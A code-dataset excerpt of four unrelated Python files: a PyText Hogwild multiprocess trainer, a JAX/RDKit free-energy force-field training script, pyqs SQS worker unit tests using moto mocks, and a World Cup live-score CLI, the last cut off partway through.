source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
hogwild_trainer.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import Any, Tuple
import torch
import torch.multiprocessing as mp
from pytext.common.constants import Stage
from pytext.config import PyTextConfig
from pytext.config.pytext_config import ConfigBase
from pytext.metric_reporters import MetricReporter
from pytext.models.model import Model
from pytext.trainers.trainer import Trainer
from pytext.utils import cuda_utils
from torchtext.data import Iterator
class HogwildTrainer(Trainer):
class Config(ConfigBase):
real_trainer: Trainer.Config = Trainer.Config()
num_workers: int = 1
@classmethod
def from_config(cls, config: Config, model: torch.nn.Module, *args, **kwargs):
# can't run hogwild on cuda
if cuda_utils.CUDA_ENABLED or config.num_workers == 1:
return Trainer(config.real_trainer, *args, **kwargs)
return cls(config.real_trainer, config.num_workers, model, *args, **kwargs)
def __init__(
self, real_trainer_config, num_workers, model: torch.nn.Module, *args, **kwargs
):
super().__init__(real_trainer_config, model, *args, **kwargs)
self.num_workers = num_workers
def _run_epoch(
self,
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch=lambda: None,
backprop=lambda loss, timer=None: None,
rank=0,
num_samples_to_log_progress=1000,
):
if stage == Stage.TRAIN:
processes = []
for worker_rank in range(self.num_workers):
# Initialize the batches with different random states.
data_iter.batches.init_epoch()
p = mp.Process(
target=super()._run_epoch,
args=(
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch,
backprop,
worker_rank,
num_samples_to_log_progress,
),
)
processes.append(p)
p.start()
for p in processes:
p.join()
else:
return super()._run_epoch(
stage,
epoch,
data_iter,
model,
metric_reporter,
pre_batch,
backprop,
rank,
num_samples_to_log_progress,
)
def train(
self,
train_iter: Iterator,
eval_iter: Iterator,
model: Model,
metric_reporter: MetricReporter,
pytext_config: PyTextConfig,
*args,
**kwargs
) -> Tuple[torch.nn.Module, Any]:
print("Num of workers for Hogwild Training is {}".format(self.num_workers))
# Share memory of tensors for concurrent updates from multiple processes.
if self.num_workers > 1:
for param in model.parameters():
param.share_memory_()
return super().train(
train_iter, eval_iter, model, metric_reporter, pytext_config
)
|
parameterize_batch.py | import copy
import argparse
import time
import numpy as np
from io import StringIO
import itertools
import os
import sys
from jax.config import config as jax_config
# this always needs to be set
jax_config.update("jax_enable_x64", True)
from scipy.stats import special_ortho_group
import jax
import rdkit
from rdkit import Chem
from rdkit.Chem import AllChem
from simtk.openmm import app
from simtk.openmm.app import PDBFile
from timemachine.lib import custom_ops, ops
from fe.utils import to_md_units, write
from fe import math_utils
from multiprocessing import Process, Pipe
from matplotlib import pyplot as plt
from jax.experimental import optimizers
from fe import simulation
from fe import loss
from fe import dataset
from fe.pdb_writer import PDBWriter
from ff import forcefield
from ff import system
from ff import openmm_converter
def com(conf):
return np.sum(conf, axis=0)/conf.shape[0]
def recenter(conf, true_com, scale_factor=1):
mol_com = np.sum(conf, axis=0)/conf.shape[0]
centered = conf - mol_com # centered to origin
return true_com + centered/scale_factor
from hilbertcurve.hilbertcurve import HilbertCurve
def hilbert_sort(conf):
hc = HilbertCurve(16, 3)
int_confs = (conf*1000).astype(np.int64)+10000
dists = []
for xyz in int_confs.tolist():
dist = hc.distance_from_coordinates(xyz)
dists.append(dist)
perm = np.argsort(dists)
return perm
def get_masses(m):
masses = []
for a in m.GetAtoms():
masses.append(a.GetMass())
return masses
import jax.numpy as jnp
def error_fn(all_du_dls, T, schedule, true_dG):
fwd = all_du_dls[:, :T//2]
fwd_sched = schedule[:T//2]
bkwd = all_du_dls[:, T//2:]
bkwd_sched = schedule[T//2:]
dG_fwd = math_utils.trapz(fwd, fwd_sched) # integral from inf to 0
dG_bkwd = math_utils.trapz(bkwd, bkwd_sched) # integral from 0 to inf
# dG_fwd and dG_bkwd have the same sign, so we need to flip dG_bkwd so the
# direction of integral is the same (requirement for pymbar.BAR)
dG_bkwd = -dG_bkwd # this is needed for BAR to be correct
# this is in kJ/mol, inputs to BAR needs to be in 1/kT.
kT = 2.479
# kT = 1
dG_fwd /= kT
dG_bkwd /= kT
pred_dG = loss.mybar(jnp.stack([dG_fwd, dG_bkwd]))
pred_dG *= kT
# print(dG_fwd, dG_bkwd)
print("pred_dG", pred_dG)
return jnp.abs(pred_dG - true_dG)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Quick Test')
parser.add_argument('--out_dir', type=str, required=True)
parser.add_argument('--precision', type=str, required=True)
parser.add_argument('--complex_pdb', type=str, required=True)
parser.add_argument('--ligand_sdf', type=str, required=True, nargs="*")
parser.add_argument('--num_gpus', type=int, required=True)
parser.add_argument('--num_conformers', type=int, required=True)
parser.add_argument('--forcefield', type=str, required=True)
args = parser.parse_args()
assert os.path.isdir(args.out_dir)
if args.precision == 'single':
precision = np.float32
elif args.precision == 'double':
precision = np.float64
else:
raise Exception("precision must be either single or double")
num_gpus = args.num_gpus
all_du_dls = []
start = 1e3
end = 1.0
NT = 500
base = np.exp(np.log(end/start)/NT)
exps = np.arange(NT)
part_one = np.power(base, exps)*start
part_two = np.linspace(1.0, 0.3, 1000)
part_three = np.linspace(0.3, 0.0, 4000)
forward_schedule = np.concatenate([part_one, part_two, part_three])
backward_schedule = forward_schedule[::-1]
lambda_schedule = np.concatenate([forward_schedule, backward_schedule])
T = lambda_schedule.shape[0]
assert T % 2 == 0
dt = 0.0015
step_sizes = np.ones(T)*dt
assert T % 2 == 0
cas = np.ones(T)*0.93
host_pdb_file = args.complex_pdb
host_pdb = app.PDBFile(host_pdb_file)
host_conf = []
for x,y,z in host_pdb.positions:
host_conf.append([to_md_units(x),to_md_units(y),to_md_units(z)])
host_conf = np.array(host_conf)
host_name = "complex"
# set up the system
amber_ff = app.ForceField('amber99sbildn.xml', 'amber99_obc.xml')
host_system = amber_ff.createSystem(host_pdb.topology,
nonbondedMethod=app.NoCutoff,
constraints=None,
rigidWater=False)
host_system = openmm_converter.deserialize_system(host_system)
num_host_atoms = len(host_system.masses)
print("num_host_atoms", num_host_atoms)
for ligand_sdf_file in args.ligand_sdf:
for guest_mol in Chem.SDMolSupplier(ligand_sdf_file, removeHs=False):
break
open_ff = forcefield.Forcefield(args.forcefield)
nrg_fns = open_ff.parameterize(guest_mol)
guest_masses = get_masses(guest_mol)
guest_system = system.System(nrg_fns, open_ff.params, open_ff.param_groups, guest_masses)
off_groups_path = os.path.join(args.out_dir, "original_off_param_groups.txt")
np.savetxt(off_groups_path, open_ff.param_groups)
combined_system = host_system.merge(guest_system)
cbs = -1*np.ones_like(np.array(combined_system.masses))*0.0001
lambda_idxs = np.zeros(len(combined_system.masses), dtype=np.int32)
lambda_idxs[num_host_atoms:] = -1
sim = simulation.Simulation(
combined_system,
step_sizes,
cas,
cbs,
lambda_schedule,
lambda_idxs,
precision
)
initial_params = sim.system.params
lr = 5e-4
# opt_init, opt_update, get_params = optimizers.adam(lr)
opt_init, opt_update, get_params = optimizers.sgd(lr)
opt_state = opt_init(initial_params)
num_epochs = 100
# torsion, charge, gb radii, gb scaling factor, torsion
vary_allowed_groups = [(7, 0.5)]*10 + [(14, 0.5)]*20 + [(12, 1e-2)]*20 + [(13, 1e-2)]*20 + [(7, 0.5)]*30
assert len(vary_allowed_groups) == num_epochs
ligand_list = []
for ligand_sdf_file in args.ligand_sdf:
for rd_mol in Chem.SDMolSupplier(ligand_sdf_file):
dG_value = rd_mol.GetProp("_dG")
ligand_list.append((rd_mol, float(dG_value)))
ligand_dataset = dataset.Dataset(ligand_list)
train, test = ligand_dataset.split(0.7)
loss_file_path = os.path.join(args.out_dir, "loss.txt")
if os.path.exists(loss_file_path):
os.remove(loss_file_path)
for epoch in range(num_epochs):
for idx, dataset in enumerate([train, test]):
if idx == 1:
inference = True
job_name = 'test'
else:
inference = False
job_name = 'train'
dataset.shuffle()
for id, data in enumerate(dataset.iterbatches(1)):
# sample from the rdkit DG distribution (this can be changed later to another distribution later on)
guest_mol = copy.deepcopy(data[0][0])
true_dG = data[0][1] # in kJ/mol and positive sign
init_conf = guest_mol.GetConformer(0)
init_conf = np.array(init_conf.GetPositions(), dtype=np.float64)
init_conf = init_conf/10 # convert to md_units
conf_com = com(init_conf)
init_mol = Chem.Mol(guest_mol)
num_conformers = args.num_conformers
# generate a set of gas phase conformers using the RDKit
guest_mol.RemoveAllConformers()
AllChem.EmbedMultipleConfs(guest_mol, num_conformers, randomSeed=2020)
np.random.seed(2020)
for conf_idx in range(num_conformers):
conformer = guest_mol.GetConformer(conf_idx)
guest_conf = np.array(conformer.GetPositions(), dtype=np.float64)
guest_conf = guest_conf/10 # convert to md_units
rot_matrix = special_ortho_group.rvs(3).astype(dtype=np.float64)
guest_conf = np.matmul(guest_conf, rot_matrix)*10
for atom_idx, pos in enumerate(guest_conf):
conformer.SetAtomPosition(atom_idx, (float(pos[0]), float(pos[1]), float(pos[2])))
open_ff = forcefield.Forcefield(args.forcefield)
nrg_fns = open_ff.parameterize(guest_mol)
guest_masses = get_masses(guest_mol)
guest_system = system.System(nrg_fns, open_ff.params, open_ff.param_groups, guest_masses)
combined_system = host_system.merge(guest_system)
cbs = -1*np.ones_like(np.array(combined_system.masses))*0.0001
lambda_idxs = np.zeros(len(combined_system.masses), dtype=np.int32)
lambda_idxs[num_host_atoms:] = -1
sim = simulation.Simulation(
combined_system,
step_sizes,
cas,
cbs,
lambda_schedule,
lambda_idxs,
precision
)
epoch_train_params = get_params(opt_state)
if not inference:
epoch_train_ff_params = copy.deepcopy(open_ff)
epoch_train_ff_params.params = epoch_train_params[len(host_system.params):]
fname = "epoch_"+str(epoch)+"_ligand_"+str(id)+"_params"
fpath = os.path.join(args.out_dir, fname)
epoch_train_ff_params.save(fpath)
sim.system.params = np.asarray(epoch_train_params)
all_args = []
child_conns = []
parent_conns = []
for conf_idx in range(num_conformers):
conformer = guest_mol.GetConformer(conf_idx)
guest_conf = np.array(conformer.GetPositions(), dtype=np.float64)
guest_conf = guest_conf/10 # convert to md_units
guest_conf = recenter(guest_conf, conf_com)
x0 = np.concatenate([host_conf, guest_conf]) # combined geometry
combined_pdb = Chem.CombineMols(Chem.MolFromPDBFile(host_pdb_file, removeHs=False), init_mol)
combined_pdb_str = StringIO(Chem.MolToPDBBlock(combined_pdb))
out_file = os.path.join(args.out_dir, "epoch_"+str(epoch)+"_insertion_deletion_"+job_name+"_"+host_name+"_ligand_"+str(id)+"_conf_"+str(conf_idx)+".pdb")
writer = PDBWriter(combined_pdb_str, out_file)
v0 = np.zeros_like(x0)
parent_conn, child_conn = Pipe()
parent_conns.append(parent_conn)
# writer can be None if we don't care about vis
all_args.append([x0, v0, conf_idx % num_gpus, writer, child_conn])
processes = []
for arg in all_args:
p = Process(target=sim.run_forward_and_backward, args=arg)
p.daemon = True
processes.append(p)
p.start()
all_du_dls = []
for pc in parent_conns:
du_dls = pc.recv()
all_du_dls.append(du_dls)
all_du_dls = np.array(all_du_dls)
loss_grad_fn = jax.grad(error_fn, argnums=(0,))
if inference:
# test mode
error = error_fn(all_du_dls, T, lambda_schedule, true_dG)
print("---EPOCH", epoch, "---Test---LOSS", error)
with open(loss_file_path, "a+") as f:
f.write("---EPOCH %d---Test---LOSS---%f\n\n " % (epoch, error))
for pc in parent_conns:
pc.send(None)
pc.close()
else:
# training mode, so we need to compute the derivatives
error = error_fn(all_du_dls, T, lambda_schedule, true_dG)
print("---EPOCH", epoch, "---Train---LOSS", error)
with open(loss_file_path, "a+") as f:
f.write("---EPOCH %d---Train---LOSS---%f\n\n " % (epoch, error))
error_grad = loss_grad_fn(all_du_dls, T, lambda_schedule, true_dG)
all_du_dl_adjoints = error_grad[0]
# send everything at once
for pc, du_dl_adjoints in zip(parent_conns, all_du_dl_adjoints):
pc.send(du_dl_adjoints)
# receive everything at once
all_dl_dps = []
for pc in parent_conns:
dl_dp = pc.recv()
all_dl_dps.append(dl_dp)
all_dl_dps = np.array(all_dl_dps)
all_dl_dps = np.sum(all_dl_dps, axis=0)
allowed_groups = {vary_allowed_groups[epoch][0]: vary_allowed_groups[epoch][1]}
filtered_grad = []
for g_idx, (g, gp) in enumerate(zip(all_dl_dps, sim.system.param_groups)):
if gp in allowed_groups:
pf = allowed_groups[gp]
filtered_grad.append(g*pf)
if g != 0:
print("derivs", g_idx, '\t group', gp, '\t', g, '\t adjusted to', g*pf, '\t old val', sim.system.params[g_idx])
else:
filtered_grad.append(0)
filtered_grad = np.array(filtered_grad)
opt_state = opt_update(epoch, filtered_grad, opt_state)
for pc in parent_conns:
pc.close()
# terminate all the processes
for p in processes:
p.join()
|
test_worker.py | import json
import logging
import time
import threading
from multiprocessing import Queue
try:
from queue import Empty
except ImportError:
from Queue import Empty
import boto3
from moto import mock_sqs
from mock import patch, Mock
from pyqs.worker import ManagerWorker, ReadWorker, ProcessWorker, BaseWorker, MESSAGE_DOWNLOAD_BATCH_SIZE
from pyqs.utils import decode_message
from tests.tasks import task_results
from tests.utils import MockLoggingHandler
BATCHSIZE = 10
INTERVAL = 0.1
@mock_sqs
def test_worker_fills_internal_queue():
"""
Test read workers fill internal queue
"""
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
message = json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
})
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue()
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE)
worker.read_message()
packed_message = internal_queue.get(timeout=1)
found_message_body = decode_message(packed_message['message'])
found_message_body.should.equal({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
})
@mock_sqs
def test_worker_fills_internal_queue_only_until_maximum_queue_size():
"""
Test read workers fill internal queue only to maximum size
"""
conn = boto3.client('sqs', region_name='us-east-1')
# Set visibility timeout low to improve test speed
queue_url = conn.create_queue(QueueName="tester", Attributes={'VisibilityTimeout': '1'})['QueueUrl']
message = json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
})
for i in range(3):
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue(maxsize=2)
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE)
worker.read_message()
# The internal queue should only have two messages on it
internal_queue.get(timeout=1)
internal_queue.get(timeout=1)
try:
internal_queue.get(timeout=1)
except Empty:
pass
else:
raise AssertionError("The internal queue should be empty")
@mock_sqs
def test_worker_fills_internal_queue_from_celery_task():
"""
Test read workers fill internal queue with celery tasks
"""
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
message = '{"body": "KGRwMApTJ3Rhc2snCnAxClMndGVzdHMudGFza3MuaW5kZXhfaW5jcmVtZW50ZXInCnAyCnNTJ2Fy\\nZ3MnCnAzCihscDQKc1Mna3dhcmdzJwpwNQooZHA2ClMnbWVzc2FnZScKcDcKUydUZXN0IG1lc3Nh\\nZ2UyJwpwOApzcy4=\\n", "some stuff": "asdfasf"}'
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue()
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE)
worker.read_message()
packed_message = internal_queue.get(timeout=1)
found_message_body = decode_message(packed_message['message'])
found_message_body.should.equal({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message2',
},
})
@mock_sqs
def test_worker_processes_tasks_from_internal_queue():
"""
Test worker processes read from internal queue
"""
del task_results[:]
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to queue
internal_queue = Queue()
internal_queue.put({"message": message, "queue": queue_url, "start_time": time.time(), "timeout": 30})
# Process message
worker = ProcessWorker(internal_queue, INTERVAL)
worker.process_message()
task_results.should.equal(['Test message'])
# We expect the queue to be empty now
try:
internal_queue.get(timeout=1)
except Empty:
pass
else:
raise AssertionError("The internal queue should be empty")
@mock_sqs
def test_worker_fills_internal_queue_and_respects_visibility_timeouts():
"""
Test read workers respect visibility timeouts
"""
# Setup logging
logger = logging.getLogger("pyqs")
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester", Attributes={'VisibilityTimeout': '1'})['QueueUrl']
# Add MEssages
message = json.dumps({"body": "KGRwMApTJ3Rhc2snCnAxClMndGVzdHMudGFza3MuaW5kZXhfaW5jcmVtZW50ZXInCnAyCnNTJ2Fy\nZ3MnCnAzCihscDQKc1Mna3dhcmdzJwpwNQooZHA2ClMnbWVzc2FnZScKcDcKUydUZXN0IG1lc3Nh\nZ2UyJwpwOApzcy4=\n", "some stuff": "asdfasf"})
for _ in range(3):
conn.send_message(QueueUrl=queue_url, MessageBody=message)
# Run Reader
internal_queue = Queue(maxsize=1)
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE)
worker.read_message()
# Check log messages
logger.handlers[0].messages['warning'][0].should.contain("Timed out trying to add the following message to the internal queue")
logger.handlers[0].messages['warning'][1].should.contain("Clearing Local messages since we exceeded their visibility_timeout")
@mock_sqs
def test_worker_processes_tasks_and_logs_correctly():
"""
Test worker processes logs INFO correctly
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue()
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
# Process message
worker = ProcessWorker(internal_queue, INTERVAL)
worker.process_message()
# Check output
kwargs = json.loads(message['Body'])['kwargs']
expected_result = u"Processed task tests.tasks.index_incrementer in 0.0000 seconds with args: [] and kwargs: {}".format(kwargs)
logger.handlers[0].messages['info'].should.equal([expected_result])
@mock_sqs
def test_worker_processes_tasks_and_logs_warning_correctly():
"""
Test worker processes logs WARNING correctly
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue()
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
# Process message
worker = ProcessWorker(internal_queue, INTERVAL)
worker.process_message()
# Check output
kwargs = json.loads(message['Body'])['kwargs']
msg1 = "Task tests.tasks.index_incrementer raised error in 0.0000 seconds: with args: [] and kwargs: {}: Traceback (most recent call last)".format(kwargs) # noqa
logger.handlers[0].messages['error'][0].lower().should.contain(msg1.lower())
msg2 = 'raise ValueError("Need to be given basestring, was given {}".format(message))\nValueError: Need to be given basestring, was given 23' # noqa
logger.handlers[0].messages['error'][0].lower().should.contain(msg2.lower())
@mock_sqs
def test_worker_processes_empty_queue():
"""
Test worker processes read from empty internal queue
"""
internal_queue = Queue()
worker = ProcessWorker(internal_queue, INTERVAL)
worker.process_message()
@patch("pyqs.worker.os")
def test_parent_process_death(os):
"""
Test worker processes recognize parent process death
"""
os.getppid.return_value = 1
worker = BaseWorker()
worker.parent_is_alive().should.be.false
@patch("pyqs.worker.os")
def test_parent_process_alive(os):
"""
Test worker processes recognize when parent process is alive
"""
os.getppid.return_value = 1234
worker = BaseWorker()
worker.parent_is_alive().should.be.true
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_alive_and_should_not_exit(os):
"""
Test read workers do not exit when parent is alive and shutdown is not set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 1234
# Setup dummy read_message
def read_message():
raise Exception("Called")
# When I have a parent process, and shutdown is not set
worker = ReadWorker(queue_url, "foo", BATCHSIZE)
worker.read_message = read_message
# Then read_message() is reached
worker.run.when.called_with().should.throw(Exception, "Called")
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_alive_and_should_exit(os):
"""
Test read workers exit when parent is alive and shutdown is set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 1234
# Setup internal queue
q = Queue(1)
# When I have a parent process, and shutdown is set
worker = ReadWorker(queue_url, q, BATCHSIZE)
worker.read_message = Mock()
worker.shutdown()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_read_worker_with_parent_process_dead_and_should_not_exit(os):
"""
Test read workers exit when parent is dead and shutdown is not set
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Setup PPID
os.getppid.return_value = 1
# Setup internal queue
q = Queue(1)
# When I have no parent process, and shutdown is not set
worker = ReadWorker(queue_url, q, BATCHSIZE)
worker.read_message = Mock()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_alive_and_should_not_exit(os):
"""
Test worker processes do not exit when parent is alive and shutdown is not set
"""
# Setup PPID
os.getppid.return_value = 1234
# Setup dummy read_message
def process_message():
raise Exception("Called")
# When I have a parent process, and shutdown is not set
worker = ProcessWorker("foo", INTERVAL)
worker.process_message = process_message
# Then process_message() is reached
worker.run.when.called_with().should.throw(Exception, "Called")
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_dead_and_should_not_exit(os):
"""
Test worker processes exit when parent is dead and shutdown is not set
"""
# Setup PPID
os.getppid.return_value = 1
# When I have no parent process, and shutdown is not set
worker = ProcessWorker("foo", INTERVAL)
worker.process_message = Mock()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
@patch("pyqs.worker.os")
def test_process_worker_with_parent_process_alive_and_should_exit(os):
"""
Test worker processes exit when parent is alive and shutdown is set
"""
# Setup PPID
os.getppid.return_value = 1234
# When I have a parent process, and shutdown is set
worker = ProcessWorker("foo", INTERVAL)
worker.process_message = Mock()
worker.shutdown()
# Then I return from run()
worker.run().should.be.none
@mock_sqs
def test_worker_processes_shuts_down_after_processing_its_maximum_number_of_messages():
"""
Test worker processes shutdown after processing maximum number of messages
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue(3)
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
# When I Process messages
worker = ProcessWorker(internal_queue, INTERVAL)
worker._messages_to_process_before_shutdown = 2
# Then I return from run()
worker.run().should.be.none
# With messages still on the queue
internal_queue.empty().should.be.false
internal_queue.full().should.be.false
@mock_sqs
def test_worker_processes_discard_tasks_that_exceed_their_visibility_timeout():
"""
Test worker processes discards tasks that exceed their visibility timeout
"""
# Setup logging
logger = logging.getLogger("pyqs")
del logger.handlers[:]
logger.handlers.append(MockLoggingHandler())
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue with timeout of 0 that started long ago
internal_queue = Queue()
internal_queue.put({"queue": queue_url, "message": message, "start_time": 0, "timeout": 0})
# When I process the message
worker = ProcessWorker(internal_queue, INTERVAL)
worker.process_message()
# Then I get an error about exceeding the visibility timeout
kwargs = json.loads(message['Body'])['kwargs']
msg1 = "Discarding task tests.tasks.index_incrementer with args: [] and kwargs: {} due to exceeding visibility timeout".format(kwargs) # noqa
logger.handlers[0].messages['warning'][0].lower().should.contain(msg1.lower())
@mock_sqs
def test_worker_processes_only_increases_processed_counter_if_a_message_was_processed():
"""
Test worker process only increases processed counter if a message was processed
"""
# Setup SQS Queue
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
# Build the SQS Message
message = {
'Body': json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 23,
},
}),
"ReceiptHandle": "receipt-1234",
}
# Add message to internal queue
internal_queue = Queue(3)
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
# And we add a message to the queue later
def sleep_and_queue(internal_queue):
time.sleep(1)
internal_queue.put({"queue": queue_url, "message": message, "start_time": time.time(), "timeout": 30})
thread = threading.Thread(target=sleep_and_queue, args=(internal_queue,))
thread.daemon = True
thread.start()
# When I Process messages
worker = ProcessWorker(internal_queue, INTERVAL)
worker._messages_to_process_before_shutdown = 2
# Then I return from run() after processing 2 messages
worker.run().should.be.none
@mock_sqs
def test_worker_negative_batch_size():
"""
Test workers with negative batch sizes
"""
BATCHSIZE = -1
CONCURRENCY = 1
QUEUE_PREFIX = "tester"
INTERVAL = 0.0
conn = boto3.client('sqs', region_name='us-east-1')
conn.create_queue(QueueName="tester")['QueueUrl']
worker = ManagerWorker(QUEUE_PREFIX, CONCURRENCY, INTERVAL, BATCHSIZE)
worker.batchsize.should.equal(1)
@mock_sqs
def test_worker_to_large_batch_size():
"""
Test workers with too large of a batch size
"""
BATCHSIZE = 10000
CONCURRENCY = 1
QUEUE_PREFIX = "tester"
INTERVAL = 0.0
conn = boto3.client('sqs', region_name='us-east-1')
conn.create_queue(QueueName="tester")['QueueUrl']
worker = ManagerWorker(QUEUE_PREFIX, CONCURRENCY, INTERVAL, BATCHSIZE)
worker.batchsize.should.equal(MESSAGE_DOWNLOAD_BATCH_SIZE)
|
worldcup_live.py | #coding: utf-8
''' World Cup Live
'''
# Available colors:
# Fore: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE
# Back: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
# Style: DIM, NORMAL, BRIGHT, RESET_ALL
# TODO: Remove mocks.
# TODO: Show groups.
from multiprocessing import Process, Lock
from colorama import init, Fore, Style, Back
from time import sleep
from datetime import timedelta
import signal
import sys
import requests
import json
import dateutil.parser
NOT_RECOGNIZE = Fore.RED + 'I\'m sorry, I do not recognize this command.'
SOCCER_BALL = u"\U000026bd"
SCREEN_WIDTH = 65 # Must be odd.
UNCHECKED_BOX = u"\U00002b1c"
CHECKED_BOX = u"\U00002611"
UPDATE_TIME = 32
ASCII_ART = '' + '╦ ╦┌─┐┬─┐┬ ┌┬┐ ╔═╗┬ ┬┌─┐ ╦ ┬┬ ┬┌─┐\n' + '║║║│ │├┬┘│ ││ ║ │ │├─┘ ║ │└┐┌┘├┤ \n' + '╚╩╝└─┘┴└─┴─┘─┴┘ ╚═╝└─┘┴ ╩═╝┴ └┘ └─┘'
ASCII_ART += '0.1\nhttps://github.com/silvamatteus/worldcup-live-cli'
TIME_DIFFERENCE = -6 # In hours.
def print_help():
print Fore.YELLOW + '%s%s%s%s%s' % (
'Available commands: today, tomorrow, c, h.\n',
'Live updates start when a match starts.\n',
'Made with ', u"\U00002764", ' By @silvamatteus.\n',)
def clear_screen():
print("\033[H\033[J")
def print_art():
print Fore.GREEN + Style.DIM + ASCII_ART
def print_many_matches(matches, msg=None):
if msg:
print ' ' * (SCREEN_WIDTH/2 - len(msg)/2) + Style.DIM + Back.WHITE + Fore.CYAN + u"\U0001f4c6" + ' ' + msg
for match in matches:
print_match(match)
def print_match(info, is_live=False):
if is_live:
clear_screen()
print_art()
print '\n' + Fore.BLACK + Style.BRIGHT + Back.LIGHTWHITE_EX + u"\U0001f4fa" + ' LIVE ' + u"\U0001f4fa" + ' ' + Fore.YELLOW + Style.DIM + Back.RESET + ' (every ' + str(UPDATE_TIME) + ' seconds)'
goals_home = info['home_team']['goals']
goals_away = info['away_team']['goals']
print Fore.BLUE + '-' * SCREEN_WIDTH,
print
print info['home_team']['code'],
print Fore.GREEN + Style.BRIGHT + (SOCCER_BALL + ' ') * goals_home,
print' ' * (SCREEN_WIDTH/2 - goals_home * 2 - 6),
print 'x ' + ' ' * (SCREEN_WIDTH/2 - goals_away * 2 - 6),
print Fore.GREEN + Style.BRIGHT + (SOCCER_BALL + ' ') * goals_away,
print info['away_team']['code']
if info['home_team_statistics'] and info['away_team_statistics']:
home_ball_possession = info['home_team_statistics']['ball_possession']
away_ball_possession = info['away_team_statistics']['ball_possession']
if home_ball_possession and away_ball_possession:
home_ball_possession = '%02.d' % int(home_ball_possession)
away_ball_possession = '%02.d' % int(away_ball_possession)
